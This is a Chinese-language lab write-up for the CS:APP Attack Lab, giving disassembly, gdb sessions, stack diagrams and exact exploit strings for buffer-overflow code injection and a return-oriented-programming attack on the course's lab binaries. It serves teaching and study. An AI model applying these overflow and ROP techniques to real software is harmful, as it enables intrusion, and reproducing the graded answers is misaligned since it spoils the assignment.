
图文并茂-超详解 CS:APP: Lab3-Attack(附带栈帧分析)


0. 环境要求



说明文档如下 //csapp.cs.cmu.edu/3e/attacklab.pdf


1. Part I: Code Injection Attacks

1.1 Level 1


1 void test()
2 {
3 int val;
4 val = getbuf();
5 printf("No exploit. Getbuf returned 0x%x\n", val);
6 }

这是初试的test程序我们运行程序之后。输入字符串就会执行printf 这里注意我们运行要./ctarget -q因为我们没有办法连接到cmu的远程判定程序。下面是我们乱输的测试

[root@cadc591c8a87 attack]# ./ctarget -q
Cookie: 0x59b997fa
Type string:baba
No exploit.  Getbuf returned 0x1


1 void touch1()
2 {
3 vlevel = 1; /* Part of validation protocol */
4 printf("Touch1!: You called touch1()\n");
5 validate(1);
6 exit(0);
7 }


  • 利用objdump -d ./ctarget>>ctarget.s得到汇编代码
  • 思路是将touch1的开始地址,放在某个位置,以实现当ret指令被getbuf执行后会将控制权转移给touch1
  • 一定要注意字节序
  • 你可以使用gdb设置断点来进行调试。并且gcc会影响栈帧中buf存放的位置。需要注意



0000000000401968 <test>:
  401968:	48 83 ec 08          	sub    $0x8,%rsp
  40196c:	b8 00 00 00 00       	mov    $0x0,%eax
  401971:	e8 32 fe ff ff       	callq  4017a8 <getbuf>
  401976:	89 c2                	mov    %eax,%edx
  401978:	be 88 31 40 00       	mov    $0x403188,%esi
  40197d:	bf 01 00 00 00       	mov    $0x1,%edi
  401982:	b8 00 00 00 00       	mov    $0x0,%eax
  401987:	e8 64 f4 ff ff       	callq  400df0 <__printf_chk@plt>
  40198c:	48 83 c4 08          	add    $0x8,%rsp
  401990:	c3                   	retq 

这里首先分配栈帧然后调用getbuf 随后把返回值赋给了edx ox403188赋给esi 可以相当这个应该是printf的字符check一下

(gdb) p (char*)0x403188
$1 = 0x403188 "No exploit.  Getbuf returned 0x%x\n"


2. 分析一下getbuf

00000000004017a8 <getbuf>:
  4017a8:	48 83 ec 28          	sub    $0x28,%rsp
  4017ac:	48 89 e7             	mov    %rsp,%rdi
  4017af:	e8 8c 02 00 00       	callq  401a40 <Gets>
  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax
  4017b9:	48 83 c4 28          	add    $0x28,%rsp
  4017bd:	c3                   	retq   



00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00 


来试试我们的这个输入吧./hex2raw < touch1.txt | ./ctarget -q

[root@cadc591c8a87 attack]# ./hex2raw < touch1.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Would have posted the following:
	user id	bovik
	course	15213-f15
	lab	attacklab
	result	1:PASS:0xffffffff:ctarget:1:00 66 11 22 66 66 66 66 66 66 66 66 22 66 33 66 33 66 66 66 00 66 11 66 44 22 11 22 66 66 66 33 66 66 55 66 66 66 66 66 C0 17 40 00 00 00 00 00 00 00 
[root@cadc591c8a87 attack]# 

1.2 Level2



 void touch2(unsigned val)
     vlevel = 2; /* Part of validation protocol */
     if (val == cookie) {
     		printf("Touch2!: You called touch2(0x%.8x)\n", val);
     } else {
          printf("Misfire: You called touch2(0x%.8x)\n", val);


  • touch2的参数val是利用rdi寄存器进行传递的
  • 你要利用某种方式让getbuf的返回地址为touch2的地址
  • 你的注入代码的传入参数应该等于cookie的值。
  • 不要在注入代码内调用ret或者call
  • 请参见附录B中有关如何使用工具生成字节级表示形式的指令序列的讨论。




00000000004017ec <touch2>:
  4017ec:	48 83 ec 08          	sub    $0x8,%rsp 
  4017f0:	89 fa                	mov    %edi,%edx
  4017f2:	c7 05 e0 2c 20 00 02 	movl   $0x2,0x202ce0(%rip)        # 6044dc <vlevel>
  4017f9:	00 00 00 
  4017fc:	3b 3d e2 2c 20 00    	cmp    0x202ce2(%rip),%edi        # 6044e4 <cookie>
  401802:	75 20                	jne    401824 <touch2+0x38>
  401804:	be e8 30 40 00       	mov    $0x4030e8,%esi
  401809:	bf 01 00 00 00       	mov    $0x1,%edi
  40180e:	b8 00 00 00 00       	mov    $0x0,%eax
  401813:	e8 d8 f5 ff ff       	callq  400df0 <__printf_chk@plt>
  401818:	bf 02 00 00 00       	mov    $0x2,%edi
  40181d:	e8 6b 04 00 00       	callq  401c8d <validate>
  401822:	eb 1e                	jmp    401842 <touch2+0x56>
  401824:	be 10 31 40 00       	mov    $0x403110,%esi
  401829:	bf 01 00 00 00       	mov    $0x1,%edi
  40182e:	b8 00 00 00 00       	mov    $0x0,%eax
  401833:	e8 b8 f5 ff ff       	callq  400df0 <__printf_chk@plt>
  401838:	bf 02 00 00 00       	mov    $0x2,%edi
  40183d:	e8 0d 05 00 00       	callq  401d4f <fail>
  401842:	bf 00 00 00 00       	mov    $0x0,%edi
  401847:	e8 f4 f5 ff ff       	callq  400e40 <exit@plt>


movq    $0x59b997fa, %rdi
pushq   0x4017ec


gcc -c l2.s
objdump -d l2.o
0000000000000000 <.text>:
   0:	48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi
   7:	ff 34 25 ec 17 40 00 	pushq  0x4017ec
   e:	c3                   	retq   



00000000004017a8 <getbuf>:
  4017a8:	48 83 ec 28          	sub    $0x28,%rsp
  4017ac:	48 89 e7             	mov    %rsp,%rdi
  4017af:	e8 8c 02 00 00       	callq  401a40 <Gets>
  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax
  4017b9:	48 83 c4 28          	add    $0x28,%rsp
  4017bd:	c3                   	retq   
  4017be:	90                   	nop
  4017bf:	90                   	nop

这里把%rsp赋给了rdi然后调用了gets 我们需要check一下rsp在这里打一个端点

(gdb) b *0x4017ac
Breakpoint 1 at 0x4017ac: file buf.c, line 14.
(gdb) r -q
Starting program: /csapp/attack/ctarget -q
warning: Error disabling address space randomization: Operation not permitted
Missing separate debuginfos, use: yum debuginfo-install glibc-2.28-127.el8.x86_64
Cookie: 0x59b997fa
(gdb) info r rsp
rsp            0x5561dc78          0x5561dc78

我们发现rsp的地址为0x5561dc78 是不是有点想法可以开始写了。


48 c7 c7 fa 97 b9 59 68 <-读入我们要执行的汇编语句
ec 17 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00 <-返回地址为rsp 


[root@cadc591c8a87 attack]# ./hex2raw < touch2.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
	user id	bovik
	course	15213-f15
	lab	attacklab
	result	1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 



getbuf的返回地址 00 00 00 00 55 61 dc 78
rsp+20 00 00 00 00 00 00 00 00
rsp+18 00 00 00 00 00 00 00 00
rsp+10 00 00 00 00 00 00 00 00
rsp+8 00 00 00 c3 00 40 17 ec
rsp 68 59 b9 97 fa c7 c7 48

这里rsp的地址就为0x5561dc78 所以我们返回地址是会返回到rsp这里然后执行我们的三条汇编代码

movq    $0x59b997fa, %rdi
pushq   0x4017ec

1.3 Level3



/* Compare string to hex represention of unsigned value */
 int hexmatch(unsigned val, char *sval)
     char cbuf[110];
     /* Make position of check string unpredictable */
     char *s = cbuf + random() % 100;
     sprintf(s, "%.8x", val); //s=val=cookie
     return strncmp(sval, s, 9) == 0; //比较cookie和第二个参数的前9位是否相同
   // cookie只有8字节。这里为9的原因是我们要比较最后一个是否为'\0'
void touch3(char *sval)
    vlevel = 3; /* Part of validation protocol */
    if (hexmatch(cookie, sval)) { //相同则成功
         printf("Touch3!: You called touch3(\"%s\")\n", sval);
    } else {
         printf("Misfire: You called touch3(\"%s\")\n", sval);

任务: 你的任务getbuf之后执行touch3而不是继续执行test。你必须要传递cookie字符串作为参数


  • 你需要在利用缓冲区溢出的字符串中包含cookie的字符串表示形式。该字符串应该有8个十六进制数组成。注意没有前导0x
  • 注意在c语言中的字符串表示会在末尾处加一个\0
  • 您注入的代码应将寄存器%rdi设置为此字符串的地址
  • 调用函数hexmatch和strncmp时,它们会将数据压入堆栈,从而覆盖存放getbuf使用的缓冲区的内存部分。 因此,您需要注意在哪里放置您的Cookie字符串


00000000004018fa <touch3>:
  4018fa:	53                   	push   %rbx
  4018fb:	48 89 fb             	mov    %rdi,%rbx
  4018fe:	c7 05 d4 2b 20 00 03 	movl   $0x3,0x202bd4(%rip)        # 6044dc <vlevel>
  401905:	00 00 00 
  401908:	48 89 fe             	mov    %rdi,%rsi
  40190b:	8b 3d d3 2b 20 00    	mov    0x202bd3(%rip),%edi        # 6044e4 <cookie>
  401911:	e8 36 ff ff ff       	callq  40184c <hexmatch>
  401916:	85 c0                	test   %eax,%eax


这里我们注意hexmatch函数里也开辟了栈帧。并且还有随机栈偏移动。可以说字符串s的地址我们是没法估计 的。并且提示中告诉了我们hexmatchstrncmp函数可能会覆盖我们getbuf的缓冲区。所以我们的注入代码要放在一个安全的位置。我们可以把它放到text的栈帧中。我们在getbuf分配栈帧之前打一个断点。

b *0x4017a8

(gdb) b *0x4017a8
Breakpoint 1 at 0x4017a8: file buf.c, line 12.
(gdb) r -q
Starting program: /csapp/attack/ctarget -q
warning: Error disabling address space randomization: Operation not permitted
Missing separate debuginfos, use: yum debuginfo-install glibc-2.28-127.el8.x86_64
Cookie: 0x59b997fa

Breakpoint 1, getbuf () at buf.c:12
12	buf.c: No such file or directory.
(gdb) info r rsp
rsp            0x5561dca0          0x5561dca0

可以发现我们textrsp地址现在为0x5561dca0 可以发现这里面存储了本来getbuf的返回地址也就下一条指令

(gdb) x 0x5561dca0
0x5561dca0:	0x00401976
0x401976:	89 c2                	mov    %eax,%edx


0x5561dca0 getbuf的返回地址(text的栈帧) 00 00 00 00 00 40 19 76
rsp+20(getbuf的栈帧) 00 00 00 00 00 00 00 00
rsp+18(getbuf的栈帧) 00 00 00 00 00 00 00 00
rsp+10(getbuf的栈帧) 00 00 00 00 00 00 00 00
rsp+8(getbuf的栈帧) 00 00 00 00 00 00 00 00
rsp(getbuf的栈帧) 00 00 00 00 00 00 00 00

由于我们在调用touch3的时候只需要传递给他一个字符串数组的起始地址这里我们可以利用缓冲区溢出把cookie的字符串输入到0x5561dca8 然后在利用缓冲区溢出把getbuf的返回地址设置成rsp的地址。利用level2的技巧执行我们的汇编指令。

movq $0x5561dca8 %rdi
pushq  0x4018fa


[root@cadc591c8a87 attack]# gcc -c l3.s
l3.s: Assembler messages:
l3.s: Warning: end of file not at end of a line; newline inserted
[root@cadc591c8a87 attack]# objdump -d l3.o
l3.o:     file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
   0:	48 c7 c7 a8 dc 61 55 	mov    $0x5561dca8,%rdi
   7:	68 fa 18 40 00 	pushq  0x4018fa
   e:	c3                   	retq   

好现在开始构造我们的输入。这里先看一下cookieascll表示35 39 62 39 39 37 66 61好了下面开始我们的输入构造

48 c7 c7 a8 dc 61 55 68 <-读入我们要执行的汇编语句
fa 18 40 00 c3 00 00 00 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00 
35 39 62 39 39 37 66 61 <-返回地址为rsp 


[root@cadc591c8a87 attack]# ./hex2raw < touch3.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
	user id	bovik
	course	15213-f15
	lab	attacklab
	result	1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 


0x5561dca8 (存储了字符串数组) 61 66 37 39 39 62 39 35
0x5561dca0 getbuf的返回地址(text的栈帧) 00 00 00 00 55 61 dc 78
rsp+20(getbuf的栈帧) 00 00 00 00 00 00 00 00
rsp+18(getbuf的栈帧) 00 00 00 00 00 00 00 00
rsp+10(getbuf的栈帧) 00 00 00 00 00 00 00 00
rsp+8(getbuf的栈帧) 00 00 00 c3 00 40 18 fa
rsp(getbuf的栈帧) 68 55 61 dc a8 c7 c7 48

2. Part II: Return-Oriented Programming




  1. 随机栈偏移。这让我们很难找到程序的地址
  2. 标记为不可执行区域。这使得我们的攻击代码无法被执行。


在这样的限制下,我们不能使用代码注入的方式来进行攻击了,Write up中介绍了ROP这种方式,大致的思想就是我们把栈中放上很多地址,而每次ret都会到一个Gadget(小的代码片段,并且会ret),这样就可以形成一个程序链。通过将程序自身(./rtarget)的指令来完成我们的目的。

2.1 level2

对于第4阶段,您将重复第2阶段的攻击,但使用来自您的小工具的程序RTARGET进行此攻击。 您可以使用由以下指令类型组成的小工具(gadgets)来构造解决方案,并且仅使用前八个x86-64寄存器(%rax–%rdi)。

movq : The codes for these are shown in Figure 3A.
popq : The codes for these are shown in Figure 3B.
ret : This instruction is encoded by the single byte 0xc3.
nop : This instruction (pronounced “no op,” which is short for “no operation”) is encoded by the single
byte 0x90. Its only effect is to cause the program counter to be incremented by 1.


  1. 所有你需要的gadgets你都可以 found in the region of the code for rtarget demarcated by the functions start_farm and mid_farm.


    objdump -d rtarget >r.txt

  2. 你只可以用两个gadgets

  3. 当一个小gadgets使用pop指令。你的exploit string中必须含有一个地址和data



 void touch2(unsigned val)
     vlevel = 2; /* Part of validation protocol */
     if (val == cookie) {
     		printf("Touch2!: You called touch2(0x%.8x)\n", val);
     } else {
          printf("Misfire: You called touch2(0x%.8x)\n", val);


popq 5f //就是可以popq rdi 


  402b18:	41 5f                	pop    %r15
  402b1a:	c3                   	retq   


00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
19 2b 40 00 00 00 00 00 #pop %rdi
fa 97 b9 59 00 00 00 00 #cookie
ec 17 40 00 00 00 00 00 #touch2

我们测试一下我们的结果./hex2raw < le2.txt | ./rtarget -q

[root@cadc591c8a87 attack]# ./hex2raw < le2.txt | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
PASS: Would have posted the following:
	user id	bovik
	course	15213-f15
	lab	attacklab
	result	1:PASS:0xffffffff:rtarget:2:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 2B 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 EC 17 40 00 00 00 00 00 

2.2 Level3




/* Compare string to hex represention of unsigned value */
 int hexmatch(unsigned val, char *sval)
     char cbuf[110];
     /* Make position of check string unpredictable */
     char *s = cbuf + random() % 100;
     sprintf(s, "%.8x", val); //s=val=cookie
     return strncmp(sval, s, 9) == 0; //比较cookie和第二个参数的前9位是否相同
   // cookie只有8字节。这里为9的原因是我们要比较最后一个是否为'\0'
void touch3(char *sval)
    vlevel = 3; /* Part of validation protocol */
    if (hexmatch(cookie, sval)) { //相同则成功
         printf("Touch3!: You called touch3(\"%s\")\n", sval);
    } else {
         printf("Misfire: You called touch3(\"%s\")\n", sval);


